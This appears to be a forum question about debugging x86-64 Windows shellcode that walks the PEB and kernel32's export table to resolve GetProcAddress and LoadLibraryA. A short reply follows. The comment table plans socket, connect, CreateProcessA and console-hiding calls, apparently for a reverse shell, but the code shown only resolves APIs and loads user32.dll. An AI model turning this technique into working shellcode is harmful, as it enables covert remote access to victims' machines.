I have code in x86_64 assembly that gets the kernel32.dll base address by walking the PEB (and so on), finds the address of GetProcAddress, uses it to get the LoadLibraryA function, and then uses LoadLibraryA to load the user32.dll module.
This is the relevant portion of code:
section .text
global _start
; Entry point (NASM syntax, x86-64 Windows). This first part walks the
; loader's module list through the PEB and leaves the kernel32.dll base
; address in RBX.
_start:
; ###### TABLE ######
; Layout of the resolved-address table that RDI points to once it has been
; set up further down (one 8-byte slot per entry):
; [rdi] = kernel32.dll
; [rdi + 0x8] = GetProcAddress
; [rdi + 0x10] = LoadLibraryA
; [rdi + 0x18] = ws2_32.dll
; [rdi + 0x20] = user32.dll
; [rdi + 0x28] = GetConsoleWindow
; [rdi + 0x30] = ShowWindow
; [rdi + 0x38] = WSAStartup
; [rdi + 0x40] = WSASocketA
; [rdi + 0x48] = connect
; [rdi + 0x50] = CreateProcessA
; [rdi + 0x58] = ExitProcess
; [rdi + 0x60] = socket fd
; ###### TABLE ######
; find the kernel32.dll base address
xor rdx, rdx ; RDX = 0, used as the base register of the gs-relative load below
mov rax, [gs: rdx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18] ; RAX = PEB->Ldr
mov rsi, [rax + 0x20] ; RSI = PEB->Ldr.InMemoryOrderModuleList
lodsq ; RAX = qword at [RSI], i.e. the forward link of the entry RSI points at
xchg rax, rsi ; RSI = that next list entry
lodsq ; RAX = forward link of that entry; treated below as kernel32's entry. NOTE(review): relies on the module load order - confirm
mov rbx, [rax + 0x20] ; RBX = kernel32 DllBase. RAX points at the entry's list links, 0x10 bytes (sizeof(_LIST_ENTRY)) into _LDR_DATA_TABLE_ENTRY, so 0x10 + 0x20 = 0x30 = offset of DllBase
; find the export table of kernel32.dll
; RBX = kernel32 base address. Each 32-bit load below zero-extends into the
; full 64-bit register, so the offset can be added to RBX directly.
mov edx, dword [rbx + 0x3c] ; IMAGE_DOS_HEADER->e_lfanew (!! is type LONG !!)
add rdx, rbx ; e_lfanew + dllbase = IMAGE_NT_HEADERS
mov edx, dword [rdx + 0x88] ; export data directory (!! is type DWORD !!)
add rdx, rbx ; offset + dllbase = address export table
mov esi, dword [rdx + 0x20] ; offset of AddressOfNames
add rsi, rbx ; RSI = address of the AddressOfNames array (one DWORD name offset per entry)
mov rcx, 0xffffffffffffffff ; RCX = -1, so the first 'inc rcx' in the loop yields index 0
; get the GetProcAddress function name
; Loop state: RCX = index of the name being examined, RSI = next entry of the
; name-offset array, RBX = kernel32 base, RDX = export table address.
; Only the first 12 bytes of each name are compared ("GetProcAddre").
; NOTE(review): the loop has no upper bound on RCX; it only ends on a match.
Get_FunctionName:
inc rcx ; index
lodsd ; EAX = offset of the next function name (upper half of RAX zeroed); RSI steps to the next entry, assuming DF is clear
add rax, rbx ; get address of the function name
cmp dword [rax], 0x50746547 ; GetP
jnz Get_FunctionName
cmp dword [rax + 0x4], 0x41636f72 ; rocA
jnz Get_FunctionName
cmp dword [rax + 0x8], 0x65726464 ; ddre
jnz Get_FunctionName
; now rax contains the address to the string 'GetProcAddress'
; find the address of GetProcAddress
; On entry here: RCX = index of the matching name, RDX = export table
; address, RBX = kernel32 base.
mov esi, dword [rdx + 0x24] ; ESI = offset of AddressOfNameOrdinals
add rsi, rbx ; RSI = address of AddressOfNameOrdinals
mov cx, [rsi + rcx * 2] ; CX = ordinal (we multiply by 2 because AddressOfNameOrdinals is a list of WORDs); only the low 16 bits of RCX are replaced, so this relies on the name index being below 0x10000
mov esi, dword [rdx + 0x1c] ; ESI = offset of AddressOfFunctions
add rsi, rbx ; RSI = address of AddressOfFunctions
mov edx, dword [rsi + rcx * 4] ; EDX = offset of GetProcAddress (entries are read as DWORDs, hence * 4)
add rdx, rbx ; RDX = address of GetProcAddress
sub rsp, 0x70 ; reserve 0x70 bytes of stack for the table (a multiple of 16, so the alignment of RSP is unchanged)
lea rdi, [rsp] ; RDI = Resolved addresses table
mov [rdi], rbx ; kernel32.dll
mov [rdi+0x8], rdx ; GetProcAddress
; Resolve LoadLibraryA: build the name on the stack, then call
; GetProcAddress(kernel32 base, "LoadLibraryA") and store the result in the
; table slot at [rdi + 0x10]. On entry RDX = GetProcAddress, RDI = table.
; RDI is callee-saved in the Microsoft x64 convention, so it is expected to
; survive the call.
sub rsp, 0x10 ; 16 bytes for the NUL-terminated name string
mov r10, 0x7262694c64616f4c
mov qword [rsp], r10 ; LoadLibr
mov r10, 0x0000000041797261
mov qword [rsp+8], r10 ; aryA, followed by zero bytes that terminate the string
sub rsp, 0x28 ; 0x28 = 40 bytes: the 32 bytes of shadow space plus 8 more. NOTE(review): RSP is 16-byte aligned at the call only if it was 8 mod 16 on entry to _start - confirm
mov rax, rdx ; RAX = GetProcAddress (RDX is about to be reused for the 2nd argument)
lea rdx, [rsp+0x28] ; 2nd argument: LoadLibraryA string
mov rcx, [rdi] ; 1st argument: base address of kernel32
call rax ; Call GetProcAddress
add rsp, 0x38 ; restore stack: 0x28 (shadow space + padding) + 0x10 ("LoadLibraryA" string)
; now rax contains the address of LoadLibraryA
mov [rdi + 0x10], rax
; Load user32.dll using LoadLibraryA
; Builds "user32.dll" on the stack, calls the LoadLibraryA pointer kept in
; the table at [rdi + 0x10] and stores the returned value at [rdi + 0x20].
sub rsp, 0x10 ; 16 bytes for the NUL-terminated name string
mov r10, 0x642E323372657375
mov qword [rsp], r10 ; user32.d
mov r10, 0x0000000000006C6C
mov qword [rsp+0x8], r10 ; ll, followed by zero bytes that terminate the string
sub rsp, 0x28 ; 0x28 = 40 bytes: the 32 bytes of shadow space plus 8 more (same stack layout as the previous call)
lea rcx, [rsp+0x28] ; 1st argument: string user32.dll
mov rax, [rdi + 0x10] ; address of LoadLibraryA
call rax
add rsp, 0x38 ; restore stack: 0x28 (shadow space + padding) + 0x10 (name string)
; now rax contains the value returned by LoadLibraryA for user32.dll
; NOTE(review): the return value is stored without being checked for failure
mov [rdi + 0x20], rax
I'm not a pro, but I really focused on following the ABI and the Windows x64 calling convention.
An interesting thing I saw is that in this post the person asking the question seems to have had the same error as me, but he answered his own question, and his problem was that the stack was not 16-byte aligned before calling LoadLibraryA. That is not my case (I think).
I compiled with mingw like this: x86_64-w64-mingw32-gcc customshell_x64.obj -o shell_x86_64.exe -nostdlib -Wl,--entry=_start
Using x64dbg on the binary, I see that once I call the LoadLibraryA function I hit an x64dbg breakpoint in the TLS callback for gdi32full.dll; if I continue execution, I get an EXCEPTION_ACCESS_VIOLATION somewhere.
I'm not used to using a debugger and, honestly, I don't know exactly what I need to look for to understand what is going on here.
Also, I used LoadLibraryA to load "ws2_32.dll" and that works with no problem.
You use `sub rsp, *` / `add rsp, *` around every function call; it is better to do this once, in the prologue and epilogue. Also, there is no real need to use assembly here at all: it is possible to write the shellcode completely in C++, which would be much easier.